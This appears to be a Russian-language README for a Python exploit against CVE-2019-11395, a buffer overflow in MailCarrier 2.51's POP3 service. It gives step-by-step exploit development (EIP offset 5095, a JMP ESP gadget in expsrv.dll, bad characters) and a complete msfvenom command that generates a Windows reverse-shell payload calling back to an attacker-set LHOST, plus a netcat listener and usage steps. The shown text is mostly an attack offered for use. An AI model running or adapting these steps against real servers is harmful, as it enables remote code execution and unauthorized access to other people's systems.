
Python-эксплойт для CVE-2019-11395, переполнение буфера в POP3-сервисе MailCarrier 2.51. Генерирует полезную нагрузку reverse shell через msfvenom и обеспечивает удалённое выполнение кода на Windows-системах.
Уязвимость CVE-2019-11395 представляет собой переполнение буфера в почтовом приложении MailCarrier 2.51, позволяющее удалённое выполнение кода. Уязвимость возникает в процессах SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP или POP3 RETR.
В ходе академического исследования основное внимание было уделено процессам POP3 для создания Proof of Concept (PoC). Было установлено, что отправка 6000 байт в приложение приводит к прекращению его работы, что выявляет уязвимость переполнения буфера.
msf-pattern_create -l 6000 для точного определения EIP.msf-pattern_offset -q 6E47386E -l 6000, в результате чего смещение EIP составило 5095.expsrv.dll с отключённым ASLR подходит для JMP ESP.\x00\x0a\x0d во время тестов на недопустимые символы.msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.CVE-2019-11395.py для адаптации под полезную нагрузку.nc -lnvp 4444 и выполнил эксплойт (CVE-2019-11395.py), чтобы получить доступ к среде и подтвердить описанную CVE.Выполните следующие шаги для использования эксплойта:
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.msfvenom.CVE-2019-11395.py, заменив переменную shellcode на вывод, полученный из команды msfvenom.CVE-2019-11395.py), чтобы получить доступ к среде и подтвердить описанную CVE.
Посетите мой профиль в LinkedIn